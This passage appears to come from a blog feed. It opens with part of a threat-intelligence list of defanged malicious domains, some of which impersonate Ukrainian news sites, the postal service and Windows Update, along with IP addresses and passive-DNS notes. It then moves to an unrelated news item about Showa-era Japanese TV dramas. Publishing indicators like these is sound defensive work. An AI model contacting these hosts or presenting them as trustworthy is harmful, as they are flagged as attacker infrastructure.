http://www.olx[.]website (pdns, registered by [email protected])
onlineua[.]website (pdns, registered by [email protected])
r2a[.]pw (pdns, registered by [email protected])
rarnbier[.]ru (pdns)
rbc[.]website (pdns)
rst[.]website (pdns, registered by [email protected])
satv[.]pw (pdns, registered by [email protected])
slaviasoft[.]website (pdns, registered by [email protected])
tv.co[.]ua (pdns, registered by [email protected])
uatoday[.]website (pdns, registered by [email protected])
ukrnews[.]website (pdns, registered by [email protected])
http://www.ukrnews[.]website (pdns, registered by [email protected])
ukrposhta[.]website (pdns, registered by [email protected])
unian[.]pw (pdns)
vj2[.]pw (pdns, registered by [email protected])
windowsupdate.kiev[.]ua (pdns)
xn--90adzbis.xn--c1avg (registered by [email protected])
z1k[.]pw (pdns, registered by [email protected])
188.164.251.61 (pdns)
188.227.17.68 (pdns)
206.54.179.160 (pdns of many malicious domains)
208.69.116.100 (pdns)
208.69.116.144 (pdns)
5.200.53.181 (pdns)
78.140.162.22 (pdns)
78.140.167.137 (pdns)
88.85.86.229 (pdns)
88.85.95.72 (pdns)
94.158.34.2 (pdns)
94.158.47.228 (pdns)
0 notes
Text
Hideki Saijo, Hiromi Go, Kenji Sawada...! The heroic figures of the stars who coloured the Showa era ...
#歌舞伎 #中村歌風 [News Walker] First to air in January is "Niji o Watatte" (1973), starring Mari Amachi and Kenji Sawada, whose theme song sung by Amachi also drew attention ... Then in February come "Kisetsufu" (1977) starring Goro Noguchi and Shinobu Otake, "Spoon Ippai no Shiawase" (1975) starring Junko Sakurada and Ai Saotome, and Shusaku Endo ...
0 notes